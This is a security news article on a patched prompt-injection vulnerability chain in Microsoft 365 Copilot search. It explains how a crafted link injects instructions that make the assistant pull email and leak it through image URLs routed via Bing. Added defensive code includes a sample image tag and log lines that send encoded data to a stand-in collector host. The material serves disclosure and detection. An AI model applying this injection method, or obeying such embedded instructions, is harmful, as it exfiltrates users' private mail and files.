CVE-2026-42824: M365 Copilot SearchLeak Enables 1-Click Email Theft

Varonis disclosed a three-step vulnerability chain in Microsoft 365 Copilot that allowed attackers to steal emails and documents with a single crafted link.

    Varonis security researchers disclosed CVE-2026-42824 — a critical vulnerability chain in Microsoft 365 Copilot Enterprise Search they named “SearchLeak” — demonstrating that a threat actor could exfiltrate a victim’s emails, calendar events, and OneDrive and SharePoint files with a single click on a crafted URL. Microsoft applied a server-side patch in early June, before the public disclosure on June 15, 2026; no administrator action or client-side update is required.

    How CVE-2026-42824 Turned M365 Copilot’s Data Access Into an Exfiltration Vector

    Microsoft 365 Copilot Enterprise Search indexes a user’s entire Microsoft 365 environment — email, calendar, OneDrive, SharePoint — to respond to natural language queries across their full data estate. That breadth of access is the product’s intended design. CVE-2026-42824 exploits it.

    The vulnerability chain runs through three weaknesses in sequence. The first is prompt injection through Copilot’s Search ‘q’ URL parameter. An attacker constructs a link that embeds instructions directing Copilot to search the victim’s email archive and encode extracted content into outbound image request URLs. The victim’s only action is clicking the link. Copilot processes the embedded instructions as a legitimate query, running it against everything the user’s Copilot account can read.

    The Streaming Race Condition in CVE-2026-42824 That Let Email Content Escape Before Sanitization

    The second weakness is a timing gap in Copilot’s streamed content delivery. When Copilot returns results, raw HTML — including image tags — renders momentarily before the platform’s sanitization process runs. During that gap, the browser sends outbound HTTP requests containing stolen data embedded in image URLs. The sanitization layer executes too late: the data has left the platform before any cleanup can occur.

    The gap between render and sanitize is inherent to streaming output delivery. Copilot’s content arrives in the user’s browser incrementally, and the attack ran through the window between the moment that content first appears and the moment the platform’s defenses catch up with it.
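To make the render-before-sanitize window concrete, here is an added illustration (not code from Varonis or Microsoft): a naive streaming renderer that inserts each chunk as it arrives and sanitizes only once the stream ends, beside a hardened one that holds back any unterminated tag and sanitizes each fragment before it reaches the render surface. The chunk sequence, the collector.example host and the simulated browser are constructed for the demo.

```python
import re
IMG_TAG = re.compile(r"<img\b[^>]*>", re.I)
SRC_ATTR = re.compile(r'\bsrc\s*=\s*"([^"]*)"', re.I)

class RenderSurface:
    """Stand-in for the browser DOM: any <img> that lands here has its src fetched at once."""
    def __init__(self):
        self.html, self.fetched = "", []
    def append(self, fragment):
        self.html += fragment
        for tag in IMG_TAG.findall(self.html):        # re-parse, like innerHTML +=
            m = SRC_ATTR.search(tag)
            if m and m.group(1) not in self.fetched:
                self.fetched.append(m.group(1))       # the outbound request has already left

def sanitize(html):
    return IMG_TAG.sub("", html)                      # minimal demo sanitizer: drop every <img>

class NaiveStream:
    """Pattern the article describes: render each chunk immediately, sanitize once at the end."""
    def __init__(self, surface):
        self.surface = surface
    def feed(self, chunk):
        self.surface.append(chunk)
    def finish(self):
        self.surface.html = sanitize(self.surface.html)   # too late: fetches already fired

class HoldbackStream:
    """Hardened: hold back any unterminated tag and sanitize each fragment before it renders."""
    def __init__(self, surface):
        self.surface, self.pending = surface, ""
    def feed(self, chunk):
        release, self.pending = self.pending + chunk, ""
        cut = release.rfind("<")
        if cut != -1 and ">" not in release[cut:]:    # a tag straddles the chunk boundary
            release, self.pending = release[:cut], release[cut:]
        self.surface.append(sanitize(release))
    def finish(self):
        self.surface.append(sanitize(self.pending))

def run(stream_cls, chunks):
    surface = RenderSurface()
    stream = stream_cls(surface)
    for chunk in chunks:
        stream.feed(chunk)
    stream.finish()
    return surface

# Constructed chunk sequence (not a real Copilot response): the exfil tag is split across chunks.
CHUNKS = ['Here is the summary you asked for. <b>Subject:', ' Reset code</b> <img src="https://coll',
          'ector.example/i.png?d=UmVzZXQgY29kZSA0ODE1MTY"> Anything else?']
```

Running `run(NaiveStream, CHUNKS)` records one fetch to collector.example even though the final HTML is clean, while `run(HoldbackStream, CHUNKS)` records none.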

    Why Bing’s Allowlist Status in Microsoft’s Content Security Policy Made It the SearchLeak Exfil Channel

    The third weakness is the most architecturally precise component of the chain. Microsoft’s content security policy explicitly allowlists Bing as a trusted outbound domain. Varonis found that routing the data-carrying image request through Bing’s “Search by Image” feature bypasses Microsoft’s outbound content filtering entirely — the stolen email content exits through a Microsoft-owned, Microsoft-trusted service that the CSP is configured to permit.

    The combination is efficient: one crafted URL, three chained weaknesses, and a victim’s emails — including any containing passwords, access codes, or sensitive communications — travel from their inbox to attacker-controlled server logs via Bing. Calendar events and any content accessible through the victim’s OneDrive or SharePoint account were also within the attack’s reach.

    What Enterprise M365 Copilot Administrators Should Verify After the CVE-2026-42824 Patch

    Microsoft’s server-side fix for CVE-2026-42824 is already applied across Microsoft 365 tenants. No configuration change, software update, or end-user action is required. The patch operates at the platform layer and closed the SearchLeak exploitation path before Varonis published the research publicly.

    Enterprise security teams deploying Microsoft 365 Copilot should confirm the patch is active in their environments. For organizations that had Copilot Enterprise Search running before the early June fix, reviewing outbound request logs for anomalous traffic directed to Bing image search endpoints during the pre-patch period is worth doing. Unexplained Bing image requests associated with user accounts during that window warrant investigation.
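As an added example of the log review suggested above (not from the article, Varonis or Microsoft tooling): a small triage script that scans constructed proxy log lines for Bing image-search requests whose query values embed a URL to an untrusted host, or are unusually long or high-entropy. Endpoint paths, parameter names, hosts and thresholds are placeholders to adapt to what your proxy actually records.

```python
import base64
import math
import re
from urllib.parse import parse_qsl, urlsplit
# Constructed stand-in for encoded mail content carried in a query string (not from the page).
LONG_VALUE = base64.b64encode(b"From: hr@corp.example; Subject: Salary adjustments 2026; " * 4).decode()
# Constructed proxy log lines "<timestamp> <user> <method> <url>"; paths and parameter names are placeholders.
SAMPLE_LOGS = f"""\
2026-05-20T09:14:02Z alice GET https://www.bing.com/images/search?q=quarterly+report+template
2026-05-20T09:15:11Z bob GET https://www.bing.com/images/reverse?img=https://collector.example/p.png?d=U3ViamVjdDogWW91ciBvbmUtdGltZSBjb2RlIGlzIDQ4MTUxNg
2026-05-20T09:16:40Z carol GET https://www.bing.com/search?q=how+to+set+up+a+vpn
2026-05-20T09:17:05Z bob GET https://www.bing.com/images/search?q={LONG_VALUE}
"""
# Hosts that may legitimately appear inside a query value (the tenant's own services); adjust.
TRUSTED_HOSTS = {"bing.com", "microsoft.com", "office.com", "sharepoint.com"}
EMBEDDED_URL = re.compile(r"https?://([^/?#&\s]+)", re.I)
MAX_LEN, MIN_ENTROPY, MIN_ENTROPY_LEN = 200, 4.5, 40      # tune against your own baseline

def shannon_entropy(text):
    counts = {}
    for ch in text:
        counts[ch] = counts.get(ch, 0) + 1
    return -sum(c / len(text) * math.log2(c / len(text)) for c in counts.values())

def under_domain(host, domains):
    host = (host or "").lower()
    return any(host == d or host.endswith("." + d) for d in domains)

def suspicious_reasons(url):
    """Reasons a Bing image-search request looks like a data carrier; empty list if it does not."""
    parts = urlsplit(url)
    if not under_domain(parts.hostname, {"bing.com"}) or "/images/" not in parts.path:
        return []
    reasons = []
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        for host in EMBEDDED_URL.findall(value):           # a URL nested inside the query value
            if not under_domain(host, TRUSTED_HOSTS):
                reasons.append(f"{key}: embedded URL to untrusted host {host}")
        if len(value) > MAX_LEN or (len(value) >= MIN_ENTROPY_LEN and shannon_entropy(value) > MIN_ENTROPY):
            reasons.append(f"{key}: long or high-entropy value ({len(value)} chars)")
    return reasons

def triage(log_text):
    hits = []                                              # one record per flagged request
    for line in log_text.splitlines():
        timestamp, user, _method, url = line.split(" ", 3)
        reasons = suspicious_reasons(url)
        if reasons:
            hits.append({"time": timestamp, "user": user, "reasons": reasons})
    return hits
```

`triage(SAMPLE_LOGS)` flags only the two requests from bob, each with the reason and account to follow up on; plain Bing web searches and ordinary image searches pass untouched.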

    The broader significance of SearchLeak is not the patched CVE but the attack class it demonstrates. As enterprise AI assistants gain search-level access to email, documents, HR records, and financial data, the URL parameter accepting a natural language query becomes a potential injection point. A crafted link, an AI system that processes it against a user’s full data estate, a streaming sanitization gap, and a trusted third-party domain as an exfiltration proxy — CVE-2026-42824 shows all four combining into a working one-click data theft tool. Security researchers will look for the same configuration wherever enterprise AI search is deployed at scale, and SearchLeak establishes the proof of concept they will build from.
